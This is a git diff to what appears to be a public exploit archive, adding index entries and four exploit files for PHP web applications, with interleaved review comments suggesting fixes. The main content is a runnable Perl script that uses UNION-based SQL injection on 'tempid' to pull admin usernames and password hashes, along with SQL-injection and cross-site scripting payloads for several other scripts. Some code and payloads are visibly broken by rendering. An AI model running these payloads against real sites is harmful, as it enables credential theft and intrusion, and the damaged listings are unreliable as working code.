diff --git a/files.csv b/files.csv
index 14220757b..86efe5941 100644
--- a/files.csv
+++ b/files.csv
@@ -25548,7 +25548,7 @@ id,file,description,date,author,platform,type,port
 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0
 19187,platforms/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0
 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0
-19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
+19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0
 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0
 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0
 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,php,webapps,0
@@ -36228,11 +36228,11 @@ id,file,description,date,author,platform,type,port
 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0
 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0
 38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0
-38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
-38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
+38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
+38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
 38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
@@ -37021,7 +37021,7 @@ id,file,description,date,author,platform,type,port
 41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
 41023,platforms/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
 41024,platforms/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
-41028,platforms/php/webapps/41028.txt,"Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
+41028,platforms/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41029,platforms/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",php,webapps,0
 41032,platforms/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' Parameter SQL Injection",2017-01-11,v3n0m,php,webapps,0
 41033,platforms/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",hardware,webapps,0
@@ -37176,3 +37176,7 @@ id,file,description,date,author,platform,type,port
 41245,platforms/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
 41246,platforms/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",php,webapps,0
 41247,platforms/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41249,platforms/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41250,platforms/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,php,webapps,0
+41251,platforms/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
+41252,platforms/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' Parameter SQL Injection",2017-02-04,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41249.pl b/platforms/php/webapps/41249.pl
new file mode 100755
index 000000000..5477831a5
--- /dev/null
+++ b/platforms/php/webapps/41249.pl
@@ -0,0 +1,44 @@
+#!/usr/bin/perl -w
+# # # # #
+# Exploit Title: AlstraSoft Template Seller Pro v3.25e Script (buy.php)- Remote SQL Injection Vulnerability
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.alstrasoft.com/
+# Software Buy: http://www.alstrasoft.com/template.htm
+# Demo: http://blizsoft.com/templates/
+# Version: 3.25e
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+print "|----------------------------------------------------|\n";
+print "| Template Seller Pro v3.25e Remote SQL Injector |\n";
+print "| Author: Ihsan Sencan |\n";
+print "| Author Web: http://ihsan.net |\n";
+print "| Mail : ihsan[beygir]ihsan[nokta]net |\n";
+print "| |\n";
+print "| |\n";
+print "|----------------------------------------------------|\n";
+use LWP::UserAgent;
+print "\nInsert Target:[http://wwww.site.com/path/]: ";
+chomp(my $target=);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+$elicha="group_concat(user_name,char(58),user_password)";
+$table="UserDB";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+$host = $target . "buy.php?tempid=-1+union+select+1,2,3,".$elicha.",5,6,7,8+from/**/".$table."+--+";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+print "\n[+] Admin Hash : $1\n";
+print "[+] Success !!\n";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/41250.txt b/platforms/php/webapps/41250.txt
new file mode 100755
index 000000000..e11a54de5
--- /dev/null
+++ b/platforms/php/webapps/41250.txt
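Review bot: The header comment of 41249.pl names buy.php but never states the injectable parameter or a fix, which is what a defender triaging this entry needs; the request built in `$host` shows it is the `tempid` GET parameter. I would add `# Parameter: tempid (GET); fix: cast to integer or bind it as a query parameter in buy.php` to the header block. The success test `[0-9a-fA-F]{32}` suggests the application keeps 32-hex-digit, presumably unsalted MD5, password hashes in `UserDB`, which deserves its own line as a second weakness. Separately, `chomp(my $target=);` does not parse as shown, so the expression after `=` was probably lost when the page was rendered and the listing should be checked against the archived file.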
@@ -0,0 +1,66 @@
+# Exploit Title : Itech Job Portal Script - Multiple Vulnerabilities
+# Author : Yunus YILDIRIM (Th3GundY)
+# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
+# Website : http://www.yunus.ninja
+# Contact : yunusyildirim@protonmail.com
+
+# Vendor Homepage : http://itechscripts.com/
+# Software Link : http://itechscripts.com/job-portal-script/
+# Vuln. Version : 9.13
+# Demo : http://job-portal.itechscripts.com/
+
+
+# # # # DETAILS # # # #
+
+SQL Injections :
+
+# 1
+http://localhost/career_advice_details.php?cid=5
+ Parameter: cid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: cid=5' AND 7504=7504-- zpmu
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 OR time-based blind (comment)
+ Payload: cid=5' OR SLEEP(5)#
+
+# 2
+http://localhost/news_details_us.php?nid=1
+ Parameter: nid (GET)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: nid=1' RLIKE (SELECT (CASE WHEN (2796=2796) THEN 1 ELSE 0x28 END))-- WmMl
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 OR time-based blind
+ Payload: nid=1' OR SLEEP(5)-- UoUN
+
+# # # # # # # # # # # # # # # # # # # # # # # #
+
+Cross site scriptings (XSS) :
+
+# 1
+http://localhost/search_result_alluser.php?function=">
+ Parameter: function (GET)
+ Payload: ">
+
+# 2
+http://localhost/search_result_alluser.php?ind=">
+ Parameter: ind (GET)
+ Payload: ">
+
+# 3
+http://localhost/search_result_alluser.php?loc=">
+ Parameter: loc (GET)
+ Payload: ">
+
+# 4
+http://localhost/search_result_alluser.php?compid=">
+ Parameter: compid (GET)
+ Payload: ">
+
+# 5
+http://job-portal.itechscripts.com/search_result_alluser.php?days_chk=">
+ Parameter: days_chk (GET)
+ Payload: ">
diff --git a/platforms/php/webapps/41251.txt b/platforms/php/webapps/41251.txt
new file mode 100755
index 000000000..3fb4885c6
--- /dev/null
+++ b/platforms/php/webapps/41251.txt
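Review bot: XSS entry #5 in 41250.txt uses the vendor's demo host, `http://job-portal.itechscripts.com/search_result_alluser.php?days_chk=`, while every other entry uses `http://localhost/`; change it to the `http://localhost/` form so the advisory is consistent. All five XSS payload lines end at `">`, which looks like markup stripped during rendering, so the entry does not show what was actually reflected. The advisory also has no remediation section: `cid` and `nid` need bound parameters or an integer cast, and the five parameters of search_result_alluser.php need output encoding on reflection.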
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: iScripts AutoHoster v3.0 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.iscripts.com/
+# Software Buy: http://www.iscripts.com/autohoster/
+# Demo: http://www.demo.iscripts.com/autohoster/demo/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/websitebuilder/getsitedetails.php?action=editsite&siteid=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41252.txt b/platforms/php/webapps/41252.txt
new file mode 100755
index 000000000..0c59e15b3
--- /dev/null
+++ b/platforms/php/webapps/41252.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: iScripts EasyCreate v3.2 Script - SQL Injection
+# Google Dork: N/A
+# Date: 04.02.2017
+# Vendor Homepage: http://www.iscripts.com/
+# Software Buy: http://www.iscripts.com/easycreate/
+# Demo: http://www.demo.iscripts.com/easycreate/demo//
+# Version: 3.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/getsitedetails.php?action=editsite&siteid=[SQL]
+# # # # #
\ No newline at end of file
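Review bot: 41251.txt says `# Login as regular user`, but nothing in its header marks the issue as authenticated-only, and the same holds for 41252.txt in the next hunk; add `# Authentication: required (regular user account)` to both headers so severity can be judged without reading the steps. Neither file names a fix; a line such as `# Fix: validate siteid as an integer and use a bound parameter in getsitedetails.php` would make the entries usable for remediation. In 41252.txt the Demo URL ends in `demo//`, which looks like a typo.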